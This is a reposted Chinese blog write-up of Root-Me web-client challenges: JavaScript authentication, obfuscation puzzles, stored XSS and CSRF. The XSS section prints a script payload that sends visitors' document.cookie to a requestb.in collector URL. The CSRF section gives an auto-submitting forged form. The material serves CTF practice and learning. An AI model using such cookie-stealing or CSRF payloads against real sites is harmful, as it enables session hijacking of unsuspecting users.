root-me web-client过关斩将

最新推荐文章于 2020-01-05 21:18:50 发布
最新推荐文章于 2020-01-05 21:18:50 发布
阅读量1.2k 收藏
点赞数
文章标签: javascript ViewUI
原文链接:http://www.cnblogs.com/lazy0/p/cbdefb1d39e96c46c33ad5d59f67f473.html
版权

Root-me-web-client过关斩将

1题,Javascript - Authentication

F12查看js的源代码,发现用户名和密码

690872-20160511162532359-1666843743.jpg

2题,Javascript - Source

F12查看js的源代码,在判断语句中看到pass

690872-20160511162533312-620113203.jpg

3题,Javascript - Authentication 2

F12查看js的源代码,在一个数组中看到pass

690872-20160511162533718-1208904907.jpg

4题,Javascript - Obfuscation 1

F12查看js的源代码,看到一个加密的pass

pass = '%63%70%61%73%62%69%65%6e%64%75%72%70%61%73%73%77%6f%72%64';

使用notepad++解密

插件---mimetool---unldecode—

690872-20160511162534140-384575454.jpg

5题,Javascript - Obfuscation 2

F12查看js的源代码,看到一串js代码没有执行

varpassunescape("unescape%28%22String.fromCharCode%2528104%252C68%252C117%252C102%252C106%252C100%252C107%252C105%252C49%252C53%252C54%2529%22%29");

使用firebox—控制台---运行一下,发现还是一个js执行语句,那就继续操作

执行三次就出现了最终的结果。

6题,Javascript - Native code

查看页面源代码,发现了js的一些代码,但是我们会看不懂是什么加密

690872-20160511162534499-1810899454.jpg

这个时候我们下载插件js反混淆器

找到加密这一点,向下查找,就找到对应的函数了

690872-20160511162534859-638704737.jpg

7题,Javascript - Obfuscation 3

F12查看页面源代码,发现fromcharcode代码一行

\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x30\x37\x2c\x34\x39\x2c\x35\x30

使用notepad++ \x替换%

%35%35%2c%35%36%2c%35%34%2c%37%39%2c%31%31%35%2c%36%39%2c%31%31%34%2c%31%31%36%2c%31%30%37%2c%34%39%2c%35%30

然后使用urldecode解密一下

55,56,54,79,115,69,114,116,107,49,50

接着我们就在firebox里面运行一下吧

String.fromCharCode(55,56,54,79,115,69,114,116,107,49,50)

690872-20160511162535421-324317112.jpg

8题,XSS - Stored 1

牵扯到一个浏览版的xss,存储性的xss漏洞获取cookie

首先我们上传一张远程连接的图片,发现能上传成功

690872-20160511162535812-273111235.jpg

登录requestb.in,创建一个新的链接请求

http://requestb.in/10886hi1

然后再留言本哪里添加这样的一句话

<script>document.write('<img src=\"http://requestb.in/1n1rscg1?cookie=='+document.cookie+'\">aaaa</img>');</script>

提交留言

当别人再次访问这个留言本页面的时候,我们就获取到了他的cookie

刷新requestb,我们就可以看到所有访问该页面人的cookie  

690872-20160511162536218-1965909246.jpg

9题,CSRF - 0 protection

Csrf跨站请求,不是admin用户

首先我们可以通过观察profile,我们看到源码吗,所有我们上传一个csrf跨站脚本

伪造了一个登录页面

 

<html>

<head></head>

<body>

<form name="csrdf" action="http://challenge01.root-me.org/web-client/ch22/?action=profile" method="post" enctype="multipart/form-data">

<input type="hidden" name="username" value="121">

<input type-"hidden" name="status" value="on">

</from>

<script>document.csrf.submit()</script>

</body>

</html>

然后刷新页面Private

690872-20160511162536593-627363830.jpg

 

10题,Javascript - Obfuscation 5

查看源代码,发现要用到ttt.js,然后我们直接访问一下ttt.js

690872-20160511162537343-972555847.jpg

接着我们将代码转化成js的形式,使用Malzillada tool

690872-20160511162537827-289181486.jpg

然后打开http://jsbeautifier.org/

放到里面美化js代码

将美化好的ttt.js插入到源代码ttt.js的地方

查看源代码,发现有出错误,修改过来

690872-20160511162538249-311092856.jpg

没做完。。。。。不会了





转载于:https://www.cnblogs.com/lazy0/p/cbdefb1d39e96c46c33ad5d59f67f473.html

weixin_34378767
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
root-me web server 20-30 writeup
weixin_34216036的博客
06-08 665
Remote File Inclusion-远程文件包含 Get the PHP source code. ctrl+u 进行RFI攻击需要同时具备三个条件(被攻击机器): allow_url_fopen = On (默认开启) allow_url_include = On (默认关闭) 被包含的变量前没有目录的限制 <?php $filename = $_GET['file']; //将参...
[Root-me]XSS - Stored 1
Vicl1fe的博客
01-05 2753
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 Root-me网址: https://www.root-me.org/en/Challenges/Web-Client/XSS-Stored-1 题目描述 Steal the administrator session cookie and use it to validate this chall. 窃取管理...
Java ME Obfuscation 使用
spottech的专栏
09-22 411
看了一大堆文章,其时Obfuscation的安装、使用超级简单。  去sourceforge下载proguard,然后解压 - Eclipse->Preferences->Java ME 设置Proguard settings,选择解压的目录, OK. Obfuscation就搞定了。  然后Create Obfuscated Package,就创建了被混淆的安装包。
CTF - RootMe解题报告(持续更新中)
ζёСяêτ - 小優YoU
01-05 8391
完整原文(实时更新):http://exp-blog.com/2019/01/02/pid-2597/ (转载请注明出处,仅供分享学习,严禁用于商业用途) 官网入口:Root-Me(https://www.root-me.org) 注:  在解题过程,官方按不同的挑战主题提供了一些工具包,建议按需善用。这里也推荐一些挑战过程中会经常用到的工具:  ① Burp Suite:攻城利器,谁用谁...
web application obfuscation
11-23
国外的一本关于安全的不错的书籍,不过是英文的,思路什么的还是很好很有借鉴价值
kafka-schema-registry-client-6.2.2.jar
04-25
mvn install:install-file -DgroupId=io.confluent -DartifactId=kafka-schema-registry-client -Dversion=6.2.2 -Dfile=/root/kafka-schema-registry-client-6.2.2.jar -Dpackaging=jar 官网下载地址 packages....
CF-Root-SGS3-v6.0.zip_CF-Root-SGS3-V6.0_ROOT
09-21
标题中的"CF-Root-SGS3-v6.0.zip_CF-Root-SGS3-V6.0_ROOT"指的是一款针对三星Galaxy S3 (SGS3) 设备的root工具包,版本为6.0。这个工具包的主要目的是使用户能够获取设备的root权限。在Android操作系统中,root权限...
ROOT-MUSIC 算法仿真
03-26
ROOT-music算法, 内含MUSIC时间对比,不相干信号仿真
3.Root-MUSIC算法MATLAB程序.rar_ROOT_ROOT——music算法_Root-MUSIC算法_music
07-15
ROOT_MUSIC算法用于处理阵列信号,获得协方差矩阵
empire-web:PowerShell Empire Web界面
05-14
PowerShell帝国Web PowerShell Empire Web利用。 它是使用的Web界面。运行Empire REST API服务器获取PowerShell Empire: : ./empire --rest --restport <port> --username <empire> --password <empire> 例如: ./...
RootMe--HTTP - POST
weixin_34253539的博客
04-03 743
题目链接:https://www.root-me.org/en/Challenges/Web-Server/HTTP-POST 打开题目有一个Give a try!的框,点击让分数超过999999。 不管怎么点分数都超不过,按F12找到Elements下面发现有一个函数 可直接修改方框里的内容,使其超过999999。然后点击方框得到flag flag:H7tp_h4s_N0_...
XSS(Stored)
kid的博客
05-02 2918
XSS(Stored) 前言 看了一个web的安全视频,里面有说说有的web漏洞都是输入输出的控制问题,虽然感觉说的太笼统了。但确实没什么毛病。sql注入来说,对用户的输入做好处理,对服务端的输出做好处理,对于我这样的菜鸡来说就很难了(字符型注入对单引号转义就感觉好难做啊) XSS也是这样。因为对用户输入控制的不严格,让用户的输入被当做代码执行。这和sql感觉就十分相似了。只不过一个是对数据库一个...
RootMe--HTTP directory indexing
weixin_34318956的博客
04-03 211
题目链接:https://www.root-me.org/en/Challenges/Web-Server/HTTP-directory-indexing 题目提示: 1.directory indexing 2. CTRL+U 打开题目发现空空的网页,啥也没有,那就CTRL+U看看网页源码 还真有注释 <!-- include("admin/pass.html"...
RootMe--HTTP - Open redirect
weixin_34072637的博客
04-02 454
题目链接:https://www.root-me.org/en/Challenges/Web-Server/HTTP-Open-redirect 点开题目后发现有三个图标链接,点击slack,发现链接后面加了字符串然后跳转到了slack的官网。先用burp suite分析下 果然后面加了一串数字,看着像MD5的特征,找个在线MD5解密网站解一下https://www.md5online...
CTF-rootme 题解之ELF - 0 protection && ELF - x86 Basic
weixin_30740295的博客
02-26 492
题目入口: https://www.root-me.org/en/Challenges/Cracking/ELF-0-protection https://www.root-me.org/en/Challenges/Cracking/ELF-x86-Basic crack-bin: http://challenge01.root-me.org/cracking/ch1/ch1.zip h...
CTF-rootme 题解之 Python - PyJail 1
weixin_30276935的博客
03-15 1980
Link:https://www.root-me.org/en/Challenges/App-Script/Python-PyJail-1 Reference:https://docs.python.org/2/library/inspect.html?highlight=func_code Solution: [ BlackArch ~ ]# ssh -p 2222 app-scrip...
CTF-rootme 题解之HTTP - Open redirect
weixin_30952535的博客
03-20 655
LINK:https://www.root-me.org/en/Challenges/Web-Server/HTTP-Open-redirect    http:challenge01.root-me.org/web-serveur/ch52/ Reference:https://github.com/zayzayzayzay/root-me-4/tree/master/Web-Serve...
root-me web server 10-20 writeup
weixin_33701294的博客
06-08 762
File upload - double extensions文件上传——双扩展 Gallery v0.02 介绍 Your goal is to hack this photo galery by uploading PHP code. /challenge/web-serveur/ch20/tmp/phpSfAkKz 访问无果 返回 查看源码 view-source:http://challe...
CTF-rootme 题解之sudo - weak configuration
weixin_30663391的博客
03-15 1114
link:https://www.root-me.org/en/Challenges/App-Script/sudo-weak-configuration app-script-ch1@challenge02:~$ cat readme.md Vous devez réussir à lire le fichier .passwd situé dans le chemin suivant :/c...
mysql -uroot -p和mysql -u root -p 区别
最新发布
01-05
`mysql -uroot -p`和`mysql -u root -p`都是在命令行中使用MySQL数据库,用于连接并运行查询命令的方式。然而,两者之间的主要区别在于他们所使用的用户名和密码。 * `mysql -uroot -p`:在这种情况下,用户名为root,密码将被提示。当你运行这个命令时,MySQL将提示你输入密码。 * `mysql -u root -p`:在这种情况下,你首先需要输入用户名root,然后提示输入密码。这种方式通常更安全,因为它强制你在输入用户名后立即输入密码。 这两种方式都需要root权限来访问MySQL数据库,因为root用户是MySQL中权限最高的用户。使用哪种方式取决于你的个人偏好和安全策略。通常,建议使用`-u root -p`这种方式,因为它强制了密码的输入,增加了安全性。 请注意,在运行任何涉及数据库的命令时,都应该小心保护你的密码,避免在公共场合(如聊天室、论坛)或其他可能被他人看到的地方泄露。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值